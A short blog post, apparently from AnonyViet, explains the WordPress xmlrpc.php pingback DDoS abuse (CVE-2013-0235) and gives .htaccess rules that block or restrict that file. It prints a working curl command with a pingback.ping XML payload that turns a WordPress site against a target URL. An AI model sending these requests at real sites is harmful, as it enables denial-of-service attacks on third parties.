Bug exploits vulnerability in file xmlrpc.php to attack DDOS
– In recent days, it is quite common to take advantage of the xmlrpc.php file vulnerability in WordPress sites to perform DDoS behavior. The internet has talked a lot about this issue, so I don’t need to say more, just Search Google with the syntax: WordPress PingBack DDOS or CVE-2013-0235.
| Join the channel Telegram of the AnonyViet 👉 Link 👈 |
The DDoS process is as follows:
– So how can the attacker easily do this??
With a short, unencrypted command, an attacker can easily take over all WordPress sites, using loops to attack someone:
Code:
curl http://www.example.com/xmlrpc.php -d
'<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>
pingback.ping</methodName><params><param><value>
<string>http://attacked.site.com/link_to_post
</string></value></param><param><value><string>
http://www.example.com/any_blog_post/
</string></value></param></params></methodCall>'
– How to protect our WordPress site from being taken advantage of by Attacker ??
Drop the .htaccess file right away in our DocumentRoot host (mostly the public_html folder) with the following content:
**** returns 403 error when accessing file.
Code:
# protect xmlrpc
<IfModule mod_alias.c>
RedirectMatch 403 /xmlrpc.php
</IfModule>
**** Redirect to another page
Code:
# protect xmlrpc
<IfModule mod_alias.c>
Redirect 301 /xmlrpc.php http://example.com/custom-page.php
</IfModule>
**** Forbidden
Code:
# protect xmlrpc
<Files xmlrpc.php>
Order Deny,Allow
Deny from all
</Files>
**** Only for a few IP access
Code:
# protect xmlrpc
<Files xmlrpc.php>
Order Deny,Allow
Deny from all
Allow from yourIP
</Files>
